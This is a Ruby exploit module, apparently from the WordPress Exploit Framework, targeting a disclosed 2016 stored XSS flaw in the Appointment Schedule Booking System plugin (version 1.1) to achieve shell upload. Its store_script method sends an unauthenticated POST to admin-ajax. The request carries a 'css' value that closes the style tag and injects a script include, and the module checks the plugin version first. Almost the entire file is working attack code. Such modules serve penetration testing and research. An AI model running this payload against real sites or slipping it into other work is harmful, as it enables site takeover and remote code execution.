# frozen_string_literal: true

class Wpxf::Exploit::AppointmentScheduleBookingSystemStoredXssShellUpload < Wpxf::Module
  include Wpxf::WordPress::StoredXss

  def initialize
    super

    update_info(
      name: 'Appointment Schedule Booking System Unauthenticated Stored XSS Shell Upload',
      author: [
        'White Fir Design', # Disclosure
        'rastating'         # WPXF module
      ],
      references: [
        ['WPVDB', '8634'],
        ['URL', 'https://www.pluginvulnerabilities.com/2016/10/03/persistent-cross-site-scripting-xss-vulnerability-in-wordpress-appointment-schedule-booking-system/']
      ],
      date: 'Oct 04 2016'
    )
  end

  def check
    check_plugin_version_from_readme('wp-appointment-schedule-booking-system', '1.1')
  end

  def vulnerable_page
    'the page containing the appointment schedule'
  end

  def store_script
    execute_post_request(
      url: wordpress_url_admin_ajax,
      body: {
        'action' => 'appointgen_save_cssfixfront',
        'cssfix' => 'front',
        'css' => "</style></style><script>#{xss_include_script}</script><style>"
      }
    )
  end
end
